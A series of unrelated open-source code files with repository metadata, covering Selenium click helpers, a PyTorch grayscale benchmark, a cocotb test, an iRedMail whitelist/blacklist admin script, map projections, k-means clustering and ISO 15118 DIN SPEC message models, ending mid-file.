def __move_and_click(self, xoffset=None, yoffset=None, click=False):
if xoffset is None:
xoffset = self.location["x"] + self.size["width"] / 2
else:
xoffset = self.location["x"] + xoffset
if yoffset is None:
yoffset = self.location["y"] + self.size["height"] / 2
else:
yoffset = self.location["y"] + yoffset
action = webdriver.common.action_chains.ActionChains(self.parent)
offset_element = self.__get_element_top_left()
action.move_to_element_with_offset(offset_element, xoffset, yoffset)
if click:
action.click()
action.perform()
def __get_element_top_left(self):
# create an empty element at the corner top left of the webpage in order to be
# able to click in the good position even if the page is scrolled
javacript_create_topleft_element = """
if(! document.getElementById("niobium-topleft-elt"))
{
var topleft_elt = document.createElement("div");
topleft_elt.style.top=0;
topleft_elt.style.left=0;
topleft_elt.style.height=0;
topleft_elt.style.width=0;
topleft_elt.style.margin=0;
topleft_elt.style.padding=0;
topleft_elt.style.position="fixed";
topleft_elt.id="niobium-topleft-elt";
document.body.appendChild(topleft_elt);
}
"""
self.parent.execute_script(javacript_create_topleft_element)
return self.parent.find_element_by_id("niobium-topleft-elt")
| cle-b/niobium | niobium/image_element.py | image_element.py | py | 3,800 | python | en | code | 1 | github-code | 90 |
33071029295 |
#import model's script and set the output file
from DCNN_benchmark.models import *
filename = f'results/{datetag}_results_3_{HOST}.json'
# Output's set up
try:
df_gray = pd.read_json(filename)
except:
df_gray = pd.DataFrame([], columns=['model', 'perf', 'fps', 'time', 'label', 'i_label', 'i_image', 'filename', 'device'])
i_trial = 0
# image preprocessing
transform = transforms.Compose([
transforms.Grayscale(3), # convert the image in grayscale
transforms.Resize(int(image_size)), # Resize the image.
transforms.CenterCrop(int(image_size-20)), # Crop the image with a 20 pixels border.
transforms.ToTensor(), # Convert the image to PyTorch Tensor data type.
transforms.Normalize( # Normalize the image by adjusting its average and
# its standard deviation at the specified values.
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)])
image_dataset_grayscale = ImageFolder(path, transform=transform) # Get the downsample dataset
# Displays the input image of the model
for i_image, (data, label) in enumerate(image_dataset_grayscale):
for name in models.keys():
model = models[name]
model.eval()
tic = time.time()
out = model(data.unsqueeze(0).to(device)).squeeze(0)
percentage = torch.nn.functional.softmax(out[i_labels], dim=0) * 100
_, indices = torch.sort(percentage, descending=True)
dt = time.time() - tic
i_label_top = reverse_labels[image_dataset_grayscale.classes[label]]
perf_ = percentage[reverse_i_labels[i_label_top]].item()
df_gray.loc[i_trial] = {'model':name, 'perf':perf_, 'time':dt, 'fps': 1/dt,
'label':labels[i_label_top], 'i_label':i_label_top,
'i_image':i_image, 'filename':image_dataset.imgs[i_image][0], 'device':str(device)}
print(f'The {name} model get {labels[i_label_top]} at {perf_:.2f} % confidence in {dt:.3f} seconds')
i_trial += 1
df_gray.to_json(filename)
| JNJER/2020-06-26_fast_and_curious | experiment_grayscale.py | experiment_grayscale.py | py | 2,266 | python | en | code | 0 | github-code | 90 |
70299171498 | import cocotb
from cocotb.triggers import Timer
from cocotb.triggers import FallingEdge
from cocotb.clock import Clock
from cocotb.handle import ModifiableObject
from cocotb.utils import get_sim_time
from cocotbnumpy.test import NumpyTest
from cocotbnumpy.signal import NumpySignal
import numpy as np
def model(inputs):
reset = inputs["reset"]
sig_in = inputs["sig_in"]
enable = inputs["enable"]
N = len(sig_in)
result = NumpySignal(np.zeros(N),[1])
count = 0
for i in range(2,N):
rising_edge = 0
if sig_in[i-3] == 0 and sig_in[i-2] == 1 and reset[i-2] != 1:
rising_edge = 1
if reset[i-1]:
count = 0
else:
count += rising_edge*enable[i-1]
result[i] = count
exp = {
"count": result
}
return exp
@cocotb.test()
async def pulse_counter_test(dut):
## Test pulses
N = 40
pulses_at = [5,6,7,9,15,20,30,35]
inputs = {
"reset": np.zeros(N),
"enable": np.ones(N),
"sig_in": np.zeros(N),
}
inputs["reset"][:1] = 1
inputs["sig_in"][pulses_at] = 1
exp = model(inputs)
nptest = NumpyTest(dut,inputs,exp,"clock")
await nptest.run()
## Test pulses and reset
N = 50
pulses_at = [5,10,15,20,25,30,35,40,45]
inputs = {
"reset": np.zeros(N),
"enable": np.ones(N),
"sig_in": np.zeros(N),
}
inputs["reset"][:1] = 1
for iEl,i in enumerate(pulses_at):
inputs["sig_in"][i] = 1
inputs["reset"][i+iEl-4] = 1
exp = model(inputs)
nptest = NumpyTest(dut,inputs,exp,"clock")
await nptest.run()
## Test pulses and enable
N = 50
pulses_at = [5,10,15,20,25,30,35,40,45]
inputs = {
"reset": np.zeros(N),
"enable": np.zeros(N),
"sig_in": np.zeros(N),
}
inputs["reset"][:1] = 1
for iEl,i in enumerate(pulses_at):
inputs["sig_in"][i] = 1
inputs["enable"][i+iEl-4] = 1
exp = model(inputs)
nptest = NumpyTest(dut,inputs,exp,"clock")
await nptest.run()
| jhugon/vhdl_libs | pulse_analysis/pulse_counter/test_pulse_counter.py | test_pulse_counter.py | py | 2,076 | python | en | code | 0 | github-code | 90 |
73411582697 | #!/usr/bin/env python3
# Author: Zhang Huangbin <zhb@iredmail.org>
# Purpose: add, delete, show whitelists/blacklists for specified local recipient.
import os
import sys
os.environ['LC_ALL'] = 'C'
rootdir = os.path.abspath(os.path.dirname(__file__)) + '/../'
sys.path.insert(0, rootdir)
import web
from libs import utils, wblist
from tools import logger
web.config.debug = False
USAGE = """Usage:
--outbound
Manage white/blacklist for outbound messages.
If no '--outbound' argument, defaults to manage inbound messages.
--account account
Add white/blacklists for specified (local) account. Valid formats:
- a single user: username@domain.com
- a single domain: @domain.com
- entire domain and all its sub-domains: @.domain.com
- anyone: @. (the ending dot is required)
if no '--account' argument, defaults to '@.' (anyone).
--add
Add white/blacklists for specified (local) account.
--delete
Delete specified white/blacklists for specified (local) account.
--delete-all
Delete ALL white/blacklists for specified (local) account.
--list
Show existing white/blacklists for specified (local) account. If no
account specified, defaults to manage server-wide white/blacklists.
--whitelist sender1 [sender2 sender3 ...]
Whitelist specified sender(s). Multiple senders must be separated by a space.
--blacklist sender1 [sender2 sender3 ...]
Blacklist specified sender(s). Multiple senders must be separated by a space.
WARNING: Do not use --list, --add-whitelist, --add-blacklist at the same time.
Sample usage:
* Show and add server-wide whitelists or blacklists:
python3 wblist_admin.py --add --whitelist 192.168.1.10 user@example.com
python3 wblist_admin.py --add --blacklist 172.16.1.10 baduser@example.com
python3 wblist_admin.py --list --whitelist
python3 wblist_admin.py --list --blacklist
* For per-user or per-domain whitelists and blacklists, please use option
`--account`. for example:
python3 wblist_admin.py --account user@mydomain.com --add --whitelist 192.168.1.10 user@example.com
python3 wblist_admin.py --account user@mydomain.com --add --blacklist 172.16.1.10 baduser@example.com
python3 wblist_admin.py --account user@mydomain.com --list --whitelist
python3 wblist_admin.py --account user@mydomain.com --list --blacklist
"""
if len(sys.argv) == 1:
print(USAGE)
sys.exit()
elif not len(sys.argv) >= 3:
sys.exit()
logger.info('* Establishing SQL connection.')
conn = utils.get_db_conn('amavisd')
args = [v for v in sys.argv[1:]]
#
# Parse command line arguments
#
inout_type = 'inbound'
if '--outbound' in args:
inout_type = 'outbound'
args.remove('--outbound')
# Get wblist account, verify whether it's hosted locally.
account = '@.'
if '--account' in args:
# per-domain or per-user account
index = args.index('--account')
account = args[index + 1]
# Remove them.
args.pop(index)
args.pop(index)
wb_account = account
wb_account_type = utils.is_valid_amavisd_address(wb_account)
if '@' not in account:
sys.exit('<<< ERROR >>> Invalid account format.')
# Get wblist type.
wblist_type = ''
for_whitelist = False
for_blacklist = False
if '--whitelist' in args:
wblist_type = 'whitelist'
for_whitelist = True
args.remove('--whitelist')
elif '--blacklist' in args:
wblist_type = 'blacklist'
for_blacklist = True
args.remove('--blacklist')
else:
sys.exit('No --whitelist or --blacklist specified. Exit.')
# Get action.
if '--add' in args:
action = 'add'
args.remove('--add')
logger.info("* Add {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--delete' in args:
action = 'delete'
args.remove('--delete')
logger.info("* Delete {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--delete-all' in args:
action = 'delete-all'
args.remove('--delete-all')
logger.info("* Delete all {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--list' in args:
action = 'list'
args.remove('--list')
logger.info("* List all {} {} for account: {}".format(inout_type, wblist_type, account))
else:
sys.exit('No --add, --delete or --list specified. Exit.')
# Get specified white/blacklists
wl = []
bl = []
# Rest of arguments are wblist senders.
wb_senders = [v.lower() for v in args if utils.is_valid_amavisd_address(v)]
if for_whitelist:
wl = wb_senders
elif for_blacklist:
bl = wb_senders
# Add, delete, show
if action == 'add':
try:
logger.info("* Add senders: {}".format(', '.join(wb_senders)))
if inout_type == 'inbound':
qr = wblist.add_wblist(conn=conn,
account=wb_account,
wl_senders=wl,
bl_senders=bl,
flush_before_import=False)
else:
# inout_type == 'outbound'
qr = wblist.add_wblist(conn=conn,
account=wb_account,
wl_rcpts=wl,
bl_rcpts=bl,
flush_before_import=False)
if not qr[0]:
logger.error(qr[1])
except Exception as e:
logger.info(repr(e))
elif action == 'delete':
try:
if inout_type == 'inbound':
qr = wblist.delete_wblist(conn=conn,
account=wb_account,
wl_senders=wl,
bl_senders=bl)
else:
# inout_type == 'outbound':
qr = wblist.delete_wblist(conn=conn,
account=wb_account,
wl_rcpts=wl,
bl_rcpts=bl)
if qr[0]:
_wl_senders = qr[1]['wl_senders']
_wl_rcpts = qr[1]['wl_rcpts']
_bl_senders = qr[1]['bl_senders']
_bl_rcpts = qr[1]['bl_rcpts']
for i in set(_wl_senders):
logger.info("- Deleted: {}".format(i))
for i in set(_wl_rcpts):
logger.info("- Deleted: {}".format(i))
for i in set(_bl_senders):
logger.info("- Deleted: {}".format(i))
for i in set(_bl_rcpts):
logger.info("- Deleted: {}".format(i))
else:
logger.error(qr[1])
except Exception as e:
logger.info(repr(e))
elif action == 'delete-all':
try:
if inout_type == 'inbound':
qr = wblist.delete_all_wblist(conn=conn,
account=wb_account,
wl_senders=for_whitelist,
bl_senders=for_blacklist)
else:
# inout_type == 'outbound':
qr = wblist.delete_all_wblist(conn=conn,
account=wb_account,
wl_rcpts=for_whitelist,
bl_rcpts=for_blacklist)
if not qr[0]:
logger.error(qr[1])
except Exception as e:
logger.info(repr(e))
else:
# action == 'list'
try:
if inout_type == 'inbound':
qr = wblist.get_account_wblist(conn=conn,
account=wb_account,
whitelist=for_whitelist,
blacklist=for_blacklist)
else:
# inout_type == 'outbound'
qr = wblist.get_account_outbound_wblist(conn=conn,
account=wb_account,
whitelist=for_whitelist,
blacklist=for_blacklist)
if qr[0]:
_wb = []
if for_whitelist:
_wb = qr[1]['whitelist']
elif for_blacklist:
_wb = qr[1]['blacklist']
if _wb:
for i in sorted(_wb):
logger.info(i)
else:
logger.info('* No whitelist/blacklist.')
else:
logger.error(qr[1])
except Exception as e:
logger.info(repr(e))
| iredmail/iRedAPD | tools/wblist_admin.py | wblist_admin.py | py | 8,580 | python | en | code | 42 | github-code | 90 |
71621079018 | #!/usr/bin/python3
import fbgui
if __name__ == '__main__':
config = fbgui.Settings()
config.msg_level = "DEBUG"
config.bg_color = fbgui.Color.LIGHTBLUE
config.fg_color = fbgui.Color.WHITE
config.font_size = 40
config.width = 320
config.height = 240
config.title = "Hello World 2"
app = fbgui.App(config)
label = fbgui.Label("id1","Hello World",
settings=fbgui.Settings({
'align': (fbgui.CENTER,fbgui.CENTER),
'fg_color': fbgui.Color.YELLOW
}),toplevel=True)
label.pack()
app.set_widget(label)
app.run()
| bablokb/pygame-fbgui | doc/helloworld2.py | helloworld2.py | py | 658 | python | en | code | 0 | github-code | 90 |
70772963817 | # homework 4
# goal: k-means clustering on vectors of TF-IDF values,
# normalized for every document.
# exports:
# student - a populated and instantiated cs525.Student object
# Clustering - a class which encapsulates the necessary logic for
# clustering a set of documents by tf-idf
# ########################################
# first, create a student object
# ########################################
import cs525
MY_NAME = "Jiani Gao"
MY_ANUM = 206844103 # put your UID here
MY_EMAIL = "jgao4@wpi.edu"
# the COLLABORATORS list contains tuples of 2 items, the name of the helper
# and their contribution to your homework
COLLABORATORS = [
]
# Set the I_AGREE_HONOR_CODE to True if you agree with the following statement
# "An Aggie does not lie, cheat or steal, or tolerate those who do."
I_AGREE_HONOR_CODE = True
# this defines the student object
student = cs525.Student(
MY_NAME,
MY_ANUM,
MY_EMAIL,
COLLABORATORS,
I_AGREE_HONOR_CODE
)
# ########################################
# now, write some code
# ########################################
# Our Clustering object will contain all logic necessary to crawl a local
# directory of text files, tokenize them, calculate tf-idf vectors on their
# contents then cluster them according to k-means. The Clustering class should
# select r random restarts to ensure getting good clusters and then use RSS, an
# internal metric, to calculate best clusters. The details are left to the
# student.
import re
from glob import glob
import numpy as np
from numpy import *
import sys
class Clustering(object):
# hint: create something here to hold your dictionary and tf-idf for every
# term in every document
def __init__(self):
self._index = {}
self._documents = []
self._tdidf_vecs = {}
# tokenize( text )
# purpose: convert a string of terms into a list of terms
# preconditions: none
# returns: list of terms contained within the text
# parameters:
# text - a string of terms
def tokenize(self, text):
# ADD CODE HERE
clean_string = re.sub('[^a-z0-9 ]', ' ', text.lower())
tokens = clean_string.split()
return tokens
def index_dir(self, base_path):
num_files_indexed = 0
for fn in glob("%s/*" % base_path):
if fn not in self._documents:
self._documents.append(fn)
num_files_indexed += 1
for line in open(fn,encoding="utf8"):
doc_idx = self._documents.index(fn)
for t in self.tokenize(line):
if t not in self._index:
self._index[t] = set()
if doc_idx not in self._index[t]:
self._index[t].add(doc_idx)
# print(self._documents)
# print(self._index)
return num_files_indexed
# Clean the path and get files name
def get_doc_name(self, path):
return path.split("/")[-1].split(".")[0]
# Calculate the term frequency in a document of a term
def cal_term_freq(self, term, fn):
term_freq = 0
for line in open(fn, encoding="utf8"):
for t in self.tokenize(line):
if t == term:
term_freq += 1
return term_freq
# Calculate TF-IDF for each document in a collection
def cal_tfidf(self):
n = len(self._documents)
for fn in self._documents:
doc_idx = self._documents.index(fn)
fn_vector = zeros((1, len(self._index)))
i = 0
for t in self._index:
term_freq = self.cal_term_freq(t, fn)
df = len(self._index[t])
if term_freq == 0:
weight = log2(n / df)
else:
weight = (1 + log2(term_freq)) * log2(n / df)
fn_vector[0][i] = weight
i += 1
self._tdidf_vecs[doc_idx] = fn_vector.tolist()
# print(self._tdidf_vecs)
return self._tdidf_vecs
# consume_dir( path, k )
# purpose: accept a path to a directory of files which need to be clustered
# preconditions: none
# returns: list of documents, clustered into k clusters
# structured as follows:
# [
# [ first, cluster, of, docs, ],
# [ second, cluster, of, docs, ],
# ...
# ]
# each cluster list above should contain the document name WITHOUT the
# preceding path. JUST The Filename.
# parameters:
# path - string path to directory of documents to cluster
# k - number of clusters to generate
def consume_dir(self, path, k):
import random
self.index_dir(path)
self.cal_tfidf()
n = len(self._documents)
min_rss = sys.maxsize
max_times = 10
for i in range(int(log2(n))):
# randomly choose k centroids from documents
list = random.sample(range(n), k)
centroid_list = []
for indx in list:
centroid_list.append(self._tdidf_vecs[indx])
cluster_list = self.get_docs_by_centroids(centroid_list)
centroid_list = self.recalculate_centroid(cluster_list)
last_rss = self.cal_rss(cluster_list, centroid_list)
for times in range(max_times):
cluster_list = self.get_docs_by_centroids(centroid_list)
centroid_list = self.recalculate_centroid(cluster_list)
rss = self.cal_rss(cluster_list, centroid_list)
if last_rss == rss:
break
last_rss = rss
if rss < min_rss:
min_rss = rss
result = cluster_list
result_doc = []
for l in result:
doc_names = []
for doc_idx in l:
doc_names.append(self.get_doc_name(self._documents[doc_idx]))
result_doc.append(doc_names)
print(result_doc)
def difference(self, last_list, centroid_list):
difference = 0
for i in range(len(last_list)):
last_vec = last_list[i]
cur_vec = centroid_list[i]
difference += np.linalg.norm((np.array(cur_vec) - np.array(last_vec)), 2)
return difference
# Calculate the RSS
def cal_rss(self, cluster_list, centroid_list):
rss = 0
for i in range(len(centroid_list)):
centroid = centroid_list[i]
docs = cluster_list[i]
rssk = 0
for doc in docs:
rssk += np.linalg.norm((np.array(centroid) - np.array(self._tdidf_vecs[doc])), 2) ** 2
rss += rssk
return rss
# Assign documents to clusters
def get_docs_by_centroids(self, centroid_list):
temp_dic = {}
for doc in self._tdidf_vecs.keys():
min_distance = sys.maxsize
for centroid in centroid_list:
distance = np.linalg.norm((np.array(centroid) - np.array(self._tdidf_vecs[doc])), 2)
if distance < min_distance:
min_distance = distance
doc_centroid = centroid
centroid_index = centroid_list.index(doc_centroid)
if centroid_index not in temp_dic.keys():
temp_dic[centroid_index] = []
temp_dic[centroid_index].append(doc)
return list(temp_dic.values())
# recalculate centroids of each cluster
def recalculate_centroid(self, cluster_list):
centroid_list = []
for list in cluster_list:
vector = zeros((1, len(self._index)))
for doc in list:
doc_vect = np.array(self._tdidf_vecs[doc])
vector += doc_vect
centroid = (1 / len(list)) * vector
centroid_list.append(centroid.tolist())
return centroid_list
# now, we'll define our main function which actually starts the clusterer
def main(args):
print(student)
clustering = Clustering()
print("test 10 documents")
print(clustering.consume_dir('test10/', 5))
print("test 50 documents")
print(clustering.consume_dir('test50/', 5))
# this little helper will call main() if this file is executed from the command
# line but not call main() if this file is included as a module
if __name__ == "__main__":
import sys
main(sys.argv)
| connieGao0819/CS525-IR-Social-Web | HW4/HW4_Jiani_Gao.py | HW4_Jiani_Gao.py | py | 8,421 | python | en | code | 0 | github-code | 90 |
18431156219 | #!/usr/bin python3
# -*- coding: utf-8 -*-
from collections import Counter
def main():
mod = 10**9+7
N = int(input())
S = list(input())
S = Counter(S)
ret = 1
for i,c in S.items():
ret *= (c+1)
ret %= mod
print((ret-1)%mod)
if __name__ == '__main__':
main() | Aasthaengg/IBMdataset | Python_codes/p03095/s658487398.py | s658487398.py | py | 308 | python | en | code | 0 | github-code | 90 |
38033285671 | import numpy as np
import os
import sys
import ntpath
import time
from . import util
import imageio
from skimage import img_as_ubyte
if sys.version_info[0] == 2:
VisdomExceptionBase = Exception
else:
VisdomExceptionBase = ConnectionError
def save_images(webpage, visuals, image_path, aspect_ratio=1.0, width=256):
"""Save images to the disk.
Parameters:
webpage (the HTML class) -- the HTML webpage class that stores these imaegs (see html.py for more details)
visuals (OrderedDict) -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
image_path (str) -- the string is used to create image paths
aspect_ratio (float) -- the aspect ratio of saved images
width (int) -- the images will be resized to width x width
This function will save images stored in 'visuals' to the HTML file specified by 'webpage'.
"""
image_dir = webpage.get_image_dir()
short_path = ntpath.basename(image_path[0])
name = os.path.splitext(short_path)[0]
webpage.add_header(name)
ims, txts, links = [], [], []
for label, im_data in visuals.items():
if 'B' in label:
continue
im = util.tensor2im(im_data)
image_name = '%s_%s.png' % (name, label)
save_path = os.path.join(image_dir, image_name)
util.save_image(im, save_path, aspect_ratio=aspect_ratio)
ims.append(image_name)
txts.append(label)
links.append(image_name)
webpage.add_images(ims, txts, links, width=width)
def save_image(images, size, img_path):
imageio.imsave(img_path, img_as_ubyte(merge(images, size)))
def merge(images, size):
h, w = images.shape[1], images.shape[2]
img = np.zeros((h * size[0], w * size[1], 3))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w:i * w + w, :] = image
return img
class Visualizer():
"""This class includes several functions that can display/save images and print/save logging information.
It uses a Python library 'visdom' for display, and a Python library 'dominate' (wrapped in 'HTML') for creating HTML files with images.
"""
def __init__(self, opt):
"""Initialize the Visualizer class
Parameters:
opt -- stores all the experiment flags; needs to be a subclass of BaseOptions
Step 1: Cache the training/test options
Step 2: connect to a visdom server
Step 3: create an HTML object for saveing HTML filters
Step 4: create a logging file to store training losses
"""
self.opt = opt # cache the option
self.name = opt.name
# create a logging file to store training losses
self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
# losses: same format as |losses| of plot_current_losses
def print_current_losses(self, epoch, iters, losses, t_comp, t_data):
"""print current losses on console; also save the losses to the disk
Parameters:
epoch (int) -- current epoch
iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
t_comp (float) -- computational time per data point (normalized by batch_size)
t_data (float) -- data loading time per data point (normalized by batch_size)
"""
message = '(epoch: %d, iters: %d, time: %.3f, data: %.3f) ' % (epoch, iters, t_comp, t_data)
for k, v in losses.items():
message += '%s: %.5f ' % (k, v)
print(message) # print the message
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message) # save the message
| IBMEOX/UltrasoundVQA | utils/visualizer.py | visualizer.py | py | 4,079 | python | en | code | 0 | github-code | 90 |
72117568616 | from numpy import *
from pyproj import *
def loadPoints(file_text):
#Load points
uv = []
with open(file_text, 'r') as file:
for line in file:
ut, vt = line.strip().split()
u, v = float(ut), float(vt)
uv.append([u, v])
return array(uv)
def samplePoints(umin, umax, vmin, vmax, Du, Dv):
#Sample graticule points
uv = []
with open("points.txt", "w") as file:
for u in range(umin,umax,Du):
for v in range(vmin,vmax,Dv):
uv.append([v, u])
return array(uv)
def sampleMeridians(umin, umax, vmin, vmax, Dv, du):
#Sample meridians
uv = []
for v in arange(vmin, vmax, Dv):
for u in arange(umin, umax, du):
uv.append([v, u])
return array(uv)
def sampleParallels(umin, umax, vmin, vmax, Du, dv):
#Sample parallels
uv = []
for u in arange(umin, umax, Du):
for v in arange(vmin, vmax, dv):
uv.append([v, u])
return array(uv)
def writePoints(file_text, u, v, x, y, a = [], b = []):
#Write points to file
with open (file_text, "w") as file:
for i in range(len(u)):
#Create line
line = str(u[i]) + '\t' + str(v[i]) + '\t' + str(x[i]) + '\t' + str(y[i]) + '\t'
#Tissote indicatrix computed
if len(a) > 0:
line += str(a[i]) + '\t' + str(b[i])
#Terminate line
line += '\n'
#Write line
file.write(line)
#Define extent and steps
umin = -80
umax = 81
vmin = -180
vmax = 181
Du = 10
Dv = 10
dv = Dv/10
du = Du/10
#Sample points, meridians and parallels
uv = samplePoints(umin, umax, vmin, vmax, Du, Dv)
uvm = sampleMeridians(umin, umax, vmin, vmax, Dv, du)
uvp = sampleParallels(umin, umax, vmin, vmax, Dv, du)
#Load Europe
uve = loadPoints('continents\eur.txt')
#Define projection
sinu = Proj(proj='sinu', R=6380)
#Compute coordinates
[x,y] = sinu(uv[:, 0], uv[:, 1])
[xm,ym] = sinu(uvm[:, 0], uvm[:, 1])
[xp,yp] = sinu(uvp[:, 0], uvp[:, 1])
[xe,ye] = sinu(uve[:, 1], uve[:, 0])
#Compute distortions [a,b] for grid points
res = sinu.get_factors(uv[:, 0], uv[:, 1])
a,b = res.tissot_semimajor, res.tissot_semiminor
#Write points to files
writePoints("points_sinu.txt", uv[:, 1], uv[:, 0], x, y, a, b)
writePoints("meridians_sinu.txt", uvm[:, 1], uvm[:, 0], xm, ym, [], [])
writePoints("parallels_sinu.txt", uvp[:, 1], uvp[:, 0], xp, yp, [], [])
writePoints("europe_sinu.txt", uve[:, 1], uve[:, 0], xe, ye, [], [])
| bayertom/mmk_2021_22 | cv_12.py | cv_12.py | py | 2,518 | python | en | code | 0 | github-code | 90 |
33405926228 | import logging
from abc import ABC
from typing import Optional, Tuple, Type
from pydantic import Field, root_validator, validator
from iso15118.shared.exceptions import V2GMessageValidationError
from iso15118.shared.messages import BaseModel
from iso15118.shared.messages.datatypes import (
DCEVSEChargeParameter,
DCEVSEStatus,
PVEVMaxCurrentLimitDin,
PVEVMaxPowerLimitDin,
PVEVMaxVoltageLimitDin,
PVEVSEMaxCurrentLimitDin,
PVEVSEMaxPowerLimitDin,
PVEVSEMaxVoltageLimitDin,
PVEVSEPresentCurrentDin,
PVEVSEPresentVoltageDin,
PVEVTargetCurrentDin,
PVEVTargetVoltageDin,
PVRemainingTimeToBulkSOCDin,
PVRemainingTimeToFullSOCDin,
SelectedServiceList,
)
from iso15118.shared.messages.din_spec.datatypes import (
ACEVChargeParameter,
ACEVSEChargeParameter,
ACEVSEStatus,
AuthOptionList,
ChargeService,
ChargingProfile,
DCEVChargeParameter,
DCEVPowerDeliveryParameter,
DCEVStatus,
ResponseCode,
SAScheduleList,
ServiceCategory,
ServiceList,
)
from iso15118.shared.messages.enums import (
AuthEnum,
EnergyTransferModeEnum,
EVSEProcessing,
)
from iso15118.shared.validators import one_field_must_be_set
logger = logging.getLogger(__name__)
class BodyBase(BaseModel, ABC):
"""
A base class for all body elements of a V2GMessage Body. This base type is
substituted by the concrete messages from SessionSetupReq to SessionStopRes
when creating a V2GMessage instance.
See section 9.3.4 Message Body Definition in DIN SPEC 70121
"""
def __str__(self):
return type(self).__name__
class Response(BodyBase, ABC):
"""
The base class for all response messages, as they all share a response code
"""
response_code: ResponseCode = Field(..., alias="ResponseCode")
class SessionSetupReq(BodyBase):
"""See section 9.4.1.2.2 in DIN SPEC 70121"""
"""Refer Table 29 under section 9.4.1.2.2"""
# XSD type hexBinary with max 8 bytes
# (Spec is quite unclear here, but data from field show that 8bytes are used)
evcc_id: str = Field(..., max_length=16, alias="EVCCID")
@validator("evcc_id")
def check_sessionid_is_hexbinary(cls, value):
"""
Checks whether the evcc_id field is a hexadecimal representation of
6 bytes.
Pydantic validators are "class methods",
see https://pydantic-docs.helpmanual.io/usage/validators/
"""
# pylint: disable=no-self-argument
# pylint: disable=no-self-use
try:
# convert value to int, assuming base 16
int(value, 16)
return value
except ValueError as exc:
raise ValueError(
f"Invalid value '{value}' for EVCCID (must be "
f"hexadecimal representation of max 6 bytes)"
) from exc
class SessionSetupRes(Response):
"""
See section 9.4.1.2.3 in DIN SPEC 70121
The SECC and the EVCC shall use the format for EVSEID as defined
in DIN SPEC 91286.
For EVSE ID format see section 5.3.2:
"Each <EVSEID> has a variable length with at least five characters (one
digit <Country Code>, three digits <Spot Operator ID>, one digit <Power Outlet ID>)
and at most forty-one characters (three digits <Country Code>,
six digits <Spot Operator ID>, thirty-two digits <Power Outlet ID>).
While the <Spot Operator ID> must be assigned by a central issuing authority,
each operator with an assigned <Spot Operator ID> can choose the <Power Outlet ID>
within the above mentioned rules freely."
This must be represented in hexbinary.
Example: The DIN SPEC 91286 EVSE ID “49*89*6360” is represented
as “0x49 0xA8 0x9A 0x63 0x60”.
"""
evse_id: str = Field(..., min_length=7, max_length=32, alias="EVSEID")
datetime_now: int = Field(None, alias="DateTimeNow")
class ServiceDiscoveryReq(BodyBase):
"""
See section 9.4.1.3.2 in DIN SPEC 70121
In the scope of DIN SPEC 70121, the optional element ServiceScope shall NOT be used.
In the scope of DIN SPEC 70121, if the optional element ServiceCategory is used,
it shall always contain the value "EVCharging"
"""
service_scope: str = Field(None, max_length=32, alias="ServiceScope")
service_category: ServiceCategory = Field(None, alias="ServiceCategory")
class ServiceDiscoveryRes(Response):
"""See section 9.4.1.3.3 in DIN SPEC 70121
In the scope of DIN SPEC 70121, the element “ServiceList” shall not be used.
In the scope of DIN SPEC 70121, only the PaymentOption “ExternalPayment”
shall be used.
"""
auth_option_list: AuthOptionList = Field(..., alias="PaymentOptions")
charge_service: ChargeService = Field(..., alias="ChargeService")
service_list: ServiceList = Field(None, alias="ServiceList")
class ServicePaymentSelectionReq(BodyBase):
"""
See section 9.4.1.4.2 in DIN SPEC 70121
[V2G-DC-252] Only the PaymentOption “ExternalPayment” shall be used,
since detailed payment options are not defined.
"""
selected_payment_option: AuthEnum = Field(..., alias="SelectedPaymentOption")
selected_service_list: SelectedServiceList = Field(..., alias="SelectedServiceList")
class ServicePaymentSelectionRes(Response):
"""See section 9.4.1.4.3 in DIN SPEC 70121"""
class ContractAuthenticationReq(BodyBase):
"""See section 9.4.1.5.1 in DIN SPEC 70121"""
# In the scope of DIN SPEC 70121, the element “GenChallenge” shall not be used.
# In the scope of DIN SPEC 70121, the element “Id” shall not be used.
gen_challenge: str = Field(None, alias="GenChallenge")
id: str = Field(None, alias="Id")
class ContractAuthenticationRes(Response):
"""
See section 9.4.1.5.2 in DIN SPEC 70121
Parameter indicating that the EVSE has finished the processing
that was initiated after the ContractAuthenticationReq or that
the EVSE is still processing at the time the response message was sent.
"""
evse_processing: EVSEProcessing = Field(None, alias="EVSEProcessing")
class ChargeParameterDiscoveryReq(BodyBase):
"""
See section 9.4.1.6.2 in DIN SPEC 70121
In the scope of DIN SPEC 70121, the EVCC shall not transmit other values
than “DC_extended” and “DC_core” in EVRequestedEnergyTransferType.
"""
requested_energy_mode: EnergyTransferModeEnum = Field(
..., alias="EVRequestedEnergyTransferType"
)
"""
In the scope of DIN SPEC 70121, the element “AC_EVChargeParameter”
shall not be used.
"""
ac_ev_charge_parameter: ACEVChargeParameter = Field(
None, alias="AC_EVChargeParameter"
)
"""
In the scope of DIN SPEC 70121, the EVSE shall provide its
maximum output power limit in the element “EVSEMaximumPowerLimit”
of “DC_EVSEChargeParameter”.
"""
dc_ev_charge_parameter: DCEVChargeParameter = Field(
None, alias="DC_EVChargeParameter"
)
@root_validator(pre=True)
def only_dc_charge_params(cls, values):
"""
Only dc_ev_charge_parameter must be set,
Pydantic validators are "class methods",
see https://pydantic-docs.helpmanual.io/usage/validators/
"""
# pylint: disable=no-self-argument
# pylint: disable=no-self-use
if one_field_must_be_set(
[
"dc_ev_charge_parameter",
"DC_EVChargeParameter",
],
values,
True,
):
return values
@root_validator()
def validate_requested_energy_mode(cls, values):
"""
requested_energy_mode must be either DC_extended or DC_core
Only dc_ev_charge_parameter must be set and must match requested_energy_mode
Pydantic validators are "class methods",
see https://pydantic-docs.helpmanual.io/usage/validators/
"""
# pylint: disable=no-self-argument
# pylint: disable=no-self-use
requested_energy_mode, ac_params, dc_params = (
values.get("requested_energy_mode"),
values.get("ac_ev_charge_parameter"),
values.get("dc_ev_charge_parameter"),
)
if requested_energy_mode not in ("DC_extended", "DC_core"):
raise V2GMessageValidationError(
